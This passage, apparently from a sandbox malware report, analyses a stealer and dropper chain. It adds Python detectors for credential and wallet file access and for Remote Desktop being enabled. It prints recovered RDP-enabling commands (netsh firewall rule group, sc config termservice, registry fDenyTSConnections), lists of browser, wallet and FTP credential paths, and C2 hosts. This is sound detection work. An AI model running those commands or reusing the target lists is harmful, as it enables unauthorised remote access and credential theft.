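# One report line: process path, event kind, target path. The '|' is optional so the
# fused "...exeFile opened:" form parses too; a trailing "Jump to behavior" is dropped.
EVENT_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)\s*\|?\s*(?P<kind>File opened|Directory queried):\s*"
    r"(?P<path>.+?)\s*(?:Jump to behavior)?\s*$"
)

# First matching rule wins; the extension rule captures the 32-character ID in group 2.
RULES = [
    ("browser_credentials", re.compile(r"\\User Data\\[^\\]+\\(Login Data( For Account)?|Web Data)$", re.I)),
    ("browser_cookies", re.compile(r"\\User Data\\[^\\]+\\Network\\Cookies$", re.I)),
    ("browser_history", re.compile(r"\\User Data\\[^\\]+\\History$", re.I)),
    ("browser_extension", re.compile(r"\\(Local|Sync) Extension Settings\\([a-p]{32})$", re.I)),
    ("firefox_secrets", re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(key4\.db|cert9\.db|logins\.json|cookies\.sqlite)$", re.I)),
    ("firefox_profile", re.compile(r"\\Mozilla\\Firefox\\Profiles(\\|$)", re.I)),
    ("desktop_wallet", re.compile(r"\\(Exodus|Ledger Live|atomic|Coinomi|Bitcoin|Binance|com\.liberty\.jaxx|Electrum(-LTC)?|Guarda)(\\|$)", re.I)),
    ("ftp_client", re.compile(r"\\(FTPbox|SmartFTP|FTPRush|FTPGetter|FTPInfo|3D-FTP)(\\|$)", re.I)),
    ("user_documents", re.compile(r"\\Users\\[^\\]+\\Documents(\\|$)", re.I)),
]

# Points per distinct category touched (once per category, not per event).
WEIGHTS = {"browser_credentials": 3, "firefox_secrets": 3, "wallet_extension": 3, "desktop_wallet": 3,
           "browser_cookies": 2, "ftp_client": 2, "browser_history": 1, "browser_extension": 1,
           "firefox_profile": 1, "user_documents": 1}


def parse_event(line):
    """Return (process basename, target path), or None for lines that are not file events."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    return m.group("src").rsplit("\\", 1)[-1], m.group("path")


def classify(path):
    """Return (category, detail); detail is the wallet name for a known wallet extension."""
    for category, rx in RULES:
        m = rx.search(path)
        if not m:
            continue
        if category == "browser_extension":
            name = WALLET_EXTENSIONS.get(m.group(2).lower())
            if name:
                return "wallet_extension", name
        return category, None
    return "other", None


def triage(lines):
    """Per-process category counts plus the wallet extensions each process went after."""
    per_process = defaultdict(Counter)
    wallets = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        proc, path = ev
        category, detail = classify(path)
        per_process[proc][category] += 1
        if detail:
            wallets[proc].add(detail)
    return per_process, wallets


def score(categories):
    return sum(WEIGHTS.get(c, 0) for c in categories)


def verdict(per_process, threshold=3):
    """Processes whose distinct-category score reaches the threshold, with the score."""
    return {p: score(c) for p, c in per_process.items() if score(c) >= threshold}


# Constructed from entries in this report, in both the fused and the separated line shapes.
SAMPLE_EVENTS = [
    r"Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn",
    r"Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies",
    r"Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db",
    r"Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush",
    r"Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior",
    r"Source: Yara matchFile source: dump.pcap, type: PCAP",
]

if __name__ == "__main__":
    per_process, wallets = triage(SAMPLE_EVENTS)
    for proc, categories in per_process.items():
        print(proc, dict(categories), sorted(wallets.get(proc, ())))
    print("flagged:", verdict(per_process))
```

Run on the full list above rather than the sample, the script separates the two stealer components cleanly: pwHxMTy.exe hits browser credentials, cookies, Firefox secrets, wallet extensions, desktop wallets and FTP clients, while 2R0700.exe is limited to desktop wallets and Documents. The weights are one point per category rather than per event, so the dozens of extension directories pwHxMTy.exe opens do not inflate its score; they matter only through the few IDs that resolve to a known wallet.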

                              Remote Access Functionality

Source: Yara match | File source: Process Memory Space: 2R0700.exe PID: 5204, type: MEMORYSTR
Source: Yara match | File source: 46.2.pwHxMTy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 46.2.pwHxMTy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 45.2.pwHxMTy.exe.4209550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.2R0700.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000002E.00000002.2016617729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: dump.pcap, type: PCAP
Source: 1E08u3.exe | String found in binary or memory: net start termservice
Source: 1E08u3.exe, 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | String found in binary or memory: net start termservice
                              Source: 1E08u3.exe, 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: 1E08u3.exe, 00000002.00000003.904297823.0000000004B60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: 1E08u3.exe, 00000002.00000003.904297823.0000000004B60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: same RDP-enabling string block as in the first 1E08u3.exe entry above (fDenyTSConnections, SYSTEM\CurrentControlSet\Control\Terminal Server, netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes, sc config termservice)
Source: rapes.exe String found in binary or memory: net start termservice
Source: rapes.exe, 00000003.00000002.982319426.0000000000711000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000003.00000002.982319426.0000000000711000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: same RDP-enabling string block as in the first 1E08u3.exe entry above
Source: rapes.exe, 00000003.00000003.941650919.00000000051C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000003.00000003.941650919.00000000051C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: same RDP-enabling string block as in the first 1E08u3.exe entry above
Source: rapes.exe String found in binary or memory: net start termservice
Source: rapes.exe, 00000004.00000002.987084215.0000000000711000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000004.00000002.987084215.0000000000711000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: same RDP-enabling string block as in the first 1E08u3.exe entry above
Source: rapes.exe, 00000004.00000003.946478690.0000000004E10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000004.00000003.946478690.0000000004E10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: same RDP-enabling string block as in the first 1E08u3.exe entry above
Source: rapes.exe, 00000009.00000003.1269297866.00000000051D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000009.00000003.1269297866.00000000051D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: same RDP-enabling string block as in the first 1E08u3.exe entry above
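The decrypted strings in the entries above (fDenyTSConnections under SYSTEM\CurrentControlSet\Control\Terminal Server, the netsh "Remote Desktop" rule-group command, sc config termservice and net start termservice) are the usual sequence for switching Remote Desktop on from inside a compromised host. The detector below is an added example and is not part of the Joe Sandbox report or of the sample's code: it classifies constructed process-creation and registry-set events against those four indicators and alerts only when two or more distinct indicators are attributed to the same actor process inside a short time window, so a lone "sc config termservice" from an administrator does not fire. The actor pid 4120, the image name rapes.exe in the sample telemetry, the exact argument forms (reg.exe "/d 0", Sysmon-style "DWORD (0x00000000)", "start= auto") and the 120 s window are assumptions.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Indicator patterns built from the strings recovered in the report above.
# The concrete argument forms (reg.exe "/d 0", Sysmon-style "DWORD (0x00000000)",
# "start= auto") are assumptions about how the change surfaces in logs.
INDICATORS = {
    # fDenyTSConnections written as 0 under ...\Control\Terminal Server = allow RDP
    "registry_fDenyTSConnections": re.compile(
        r"fDenyTSConnections\b.*?(?:/d\s+0x?0*\b|DWORD \(0x0+\))", re.IGNORECASE),
    # opens the firewall for the whole "Remote Desktop" rule group
    "netsh_enable_rdp_rule_group": re.compile(
        r"netsh\s+advfirewall\s+firewall\s+set\s+rule\s+group=\"?Remote Desktop\"?"
        r"\s+new\s+enable=yes", re.IGNORECASE),
    # reconfigures the Terminal Services service (e.g. start type)
    "sc_config_termservice": re.compile(
        r"\bsc(?:\.exe)?\s+config\s+termservice\b", re.IGNORECASE),
    # starts the Terminal Services service
    "net_start_termservice": re.compile(
        r"\bnet(?:\.exe|1)?\s+start\s+termservice\b", re.IGNORECASE),
}


@dataclass(frozen=True)
class Event:
    ts: float        # seconds since start of the trace
    actor_pid: int   # process held responsible: parent of the spawned tool, or writer of the registry value
    image: str       # image of the process that performed the action
    detail: str      # command line (process create) or "key\value = data" (registry set)


def classify(event: Event) -> Optional[str]:
    """Return the name of the first indicator the event matches, or None."""
    for name, pattern in INDICATORS.items():
        if pattern.search(event.detail):
            return name
    return None


def detect_rdp_enablement(events: List[Event], window: float = 120.0,
                          min_indicators: int = 2) -> List[dict]:
    """One alert per actor pid that accumulates at least `min_indicators`
    distinct indicators inside any `window`-second span. A single indicator
    (an admin running "sc config termservice") never fires on its own."""
    by_actor: Dict[int, List[tuple]] = defaultdict(list)
    for ev in events:
        name = classify(ev)
        if name is not None:
            by_actor[ev.actor_pid].append((ev.ts, name, ev.image))

    alerts = []
    for actor_pid, hits in by_actor.items():
        hits.sort(key=lambda h: h[0])
        best: List[tuple] = []
        # slide a window that starts at each hit; keep the span with most distinct indicators
        for i, (t0, _, _) in enumerate(hits):
            span = [h for h in hits[i:] if h[0] - t0 <= window]
            if len({h[1] for h in span}) > len({h[1] for h in best}):
                best = span
        names = sorted({h[1] for h in best})
        if len(names) >= min_indicators:
            alerts.append({
                "actor_pid": actor_pid,
                "indicators": names,
                "images": sorted({h[2] for h in best}),
                "first_ts": best[0][0],
                "last_ts": best[-1][0],
            })
    return alerts


# Constructed sample telemetry (not from the report). pid 4120 / rapes.exe is an
# assumed stand-in for the dropper; the last three events are benign or isolated.
SAMPLE_EVENTS = [
    Event(10.0, 4120, "rapes.exe",
          r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections = DWORD (0x00000000)"),
    Event(10.5, 4120, "netsh.exe",
          'netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes'),
    Event(11.0, 4120, "sc.exe", "sc config termservice start= auto"),
    Event(11.2, 4120, "net.exe", "net start termservice"),
    Event(500.0, 880, "net.exe", "net start spooler"),
    Event(600.0, 900, "netsh.exe", "netsh advfirewall show allprofiles"),
    Event(700.0, 950, "sc.exe", "sc config termservice start= disabled"),
]


if __name__ == "__main__":
    for alert in detect_rdp_enablement(SAMPLE_EVENTS):
        print(alert)
```

Attribution to the parent (actor) rather than to the tool image is what makes the correlation work: each indicator is executed by a different short-lived binary (reg.exe, netsh.exe, sc.exe, net.exe), so keying on the spawning process is the only stable join. The registry indicator also accepts a registry-set event written directly by the actor, since the sample carries the key path and value name as strings and need not shell out to reg.exe.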
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe Code function: 17_2_009F13A0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 17_2_009F13A0
MITRE ATT&CK Matrix (one line per tactic column; a number in front of a technique is the count badge the matrix shows for that technique)
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
Execution: 121 Windows Management Instrumentation; 2 Native API; 13 Command and Scripting Interpreter; 11 Scheduled Task/Job; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
Persistence: 111 Scripting; 11 DLL Side-Loading; 11 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Privilege Escalation: 1 Abuse Elevation Control Mechanism; 11 DLL Side-Loading; 1 Access Token Manipulation; 512 Process Injection; 11 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Defense Evasion: 1 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 23 Software Packing; 1 Timestomp; 11 DLL Side-Loading; 121 Masquerading; 451 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 512 Process Injection; 1 Rundll32
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
Discovery: 1 System Time Discovery; 13 File and Directory Discovery; 349 System Information Discovery; 1081 Security Software Discovery; 3 Process Discovery; 451 Virtualization/Sandbox Evasion; 1 Application Window Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery; System Network Connections Discovery; Process Discovery
Lateral Movement: 1 Remote Desktop Protocol; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
Collection: 11 Archive Collected Data; 41 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
Command and Control: 11 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 124 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking
Behavior Graph (ID: 1631980; Sample: mQRr8Rkorf.exe; Start date: 07/03/2025; Architecture: WINDOWS; Score: 100)
Each node below lists the hosts it contacted, the files it dropped, the signatures matched on it and the processes it started; a number in parentheses after a process name is the graph's created registry value / created file counter.

Start (mQRr8Rkorf.exe)
  Contacts: techspherxe.top; fostinjec.today; 6 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 20 other signatures
  Starts: rapes.exe (40); mQRr8Rkorf.exe (1 4); rapes.exe; 4 other processes

rapes.exe (40)
  Contacts: 176.113.115.6, 49696, 49697, 49699 SELECTELRU Russian Federation; 185.215.113.16 WHOLESALECONNECTIONSNL Portugal; pulseon.top 82.115.223.119 MIDNET-ASTK-TelecomRU Russian Federation
  Drops: C:\Users\user\AppData\Local\...\packed.exe (PE32+); C:\Users\user\AppData\Local\...\bncn6rv.exe (PE32); C:\Users\user\AppData\Local\...\amnew.exe (PE32); 13 other malicious files
  Signatures: Contains functionality to start a terminal service; Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check)
  Starts: ADFoyxP.exe; HmngBpR.exe (12); pwHxMTy.exe; 9hUDDVk.exe

mQRr8Rkorf.exe (1 4)
  Drops: C:\Users\user\AppData\Local\...\A7B94.exe (PE32); C:\Users\user\AppData\Local\...\3E11p.exe (PE32)
  Signatures: Writes many files with high entropy
  Starts: A7B94.exe (1 4)

rapes.exe (second instance started from the sample)
  Signatures: Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

4 other processes (started from the sample)
  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage); Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
  Starts: cmd.exe; TradeHub.com

ADFoyxP.exe
  Drops: C:\Users\user\AppData\Local\...\Worcester.pub (data); 36 other malicious files
  Signatures: Multi AV Scanner detection for dropped file; Writes many files with high entropy
  Starts: cmd.exe

HmngBpR.exe (12)
  Drops: C:\Users\user\AppData\...\vcruntime140.dll (PE32); C:\Users\user\AppData\Local\...\msvcp140.dll (PE32); C:\Users\user\AppData\Local\...\SplashWin.exe (PE32); 2 other malicious files
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
  Starts: SplashWin.exe

pwHxMTy.exe
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Injects a PE file into a foreign processes
  Starts: pwHxMTy.exe (child instance); WerFault.exe

9hUDDVk.exe
  Contacts: agroecologyguide.digital 104.21.48.201 CLOUDFLARENETUS United States

A7B94.exe (1 4)
  Drops: C:\Users\user\AppData\Local\...\2R0700.exe (PE32); C:\Users\user\AppData\Local\...\1E08u3.exe (PE32)
  Signatures: Antivirus detection for dropped file
  Starts: 1E08u3.exe (4); 2R0700.exe

cmd.exe (started by the 4 other processes)
  Drops: C:\Users\user\AppData\Local\...\uvwnwebboksg (PE32)
  Signatures: Injects code into the Windows Explorer (explorer.exe)
  Starts: conhost.exe

cmd.exe (started by ADFoyxP.exe)
  Drops: C:\Users\user\AppData\Local\Temp\...\Seat.com (PE32)
  Starts: Seat.com; cmd.exe; conhost.exe; 10 other processes

SplashWin.exe (started by HmngBpR.exe)
  Drops: C:\Users\user\AppData\...\vcruntime140.dll (PE32); C:\Users\user\AppData\...\msvcp140.dll (PE32); C:\Users\user\AppData\...\SplashWin.exe (PE32); C:\Users\user\AppData\...\DuiLib_u.dll (PE32)
  Signatures: Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR)
  Starts: SplashWin.exe

pwHxMTy.exe (child instance)
  Contacts: fostinjec.today 104.21.112.1 CLOUDFLARENETUS United States
  Signatures: Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets

1E08u3.exe (4)
  Drops: C:\Users\user\AppData\Local\...\rapes.exe (PE32)
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 6 other signatures
  Starts: rapes.exe

2R0700.exe
  Contacts: 176.113.115.7, 49688, 49698, 49700 SELECTELRU Russian Federation; defaulemot.run 104.21.48.1, 443, 49681, 49682 CLOUDFLARENETUS United States
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen)

Seat.com
  Drops: C:\Users\user\AppData\Local\...\TradeHub.com (PE32); C:\Users\user\AppData\Local\...\RegAsm.exe (PE32); C:\Users\user\AppData\Local\...\TradeHub.js (ASCII); C:\Users\user\AppData\Local\...\F (data)
  Signatures: Drops PE files with a suspicious file extension; Writes to foreign memory regions; Writes many files with high entropy; Injects a PE file into a foreign processes
  Starts: cmd.exe; cmd.exe

cmd.exe (started by the cmd.exe that dropped Seat.com)
  Drops: C:\Users\user\AppData\Local\Temp\353090\m (data)

SplashWin.exe (second instance, started by the first SplashWin.exe)
  Signatures: Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR)
  Starts: cmd.exe

rapes.exe (started by 1E08u3.exe)
  Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Contains functionality to start a terminal service; 5 other signatures

cmd.exe (first child of Seat.com)
  Drops: C:\Users\user\AppData\...\TradeHub.url (MS)
  Starts: conhost.exe

cmd.exe (second child of Seat.com)
  Starts: conhost.exe; schtasks.exe

cmd.exe (started by the second SplashWin.exe)
  Drops: C:\Users\user\AppData\Local\Temp\han (PE32)
  Signatures: Injects code into the Windows Explorer (explorer.exe); Drops PE files with a suspicious file extension; Uses schtasks.exe or at.exe to add and modify task schedules; 4 other signatures
  Starts: explorer.exe; conhost.exe

explorer.exe
  Contacts: 185.183.32.103 WORLDSTREAMNL Netherlands
  Drops: C:\Users\user\AppData\Local\...\Kytabo.db (DOS)
  Signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs); Switches to a custom stack to bypass stack traces
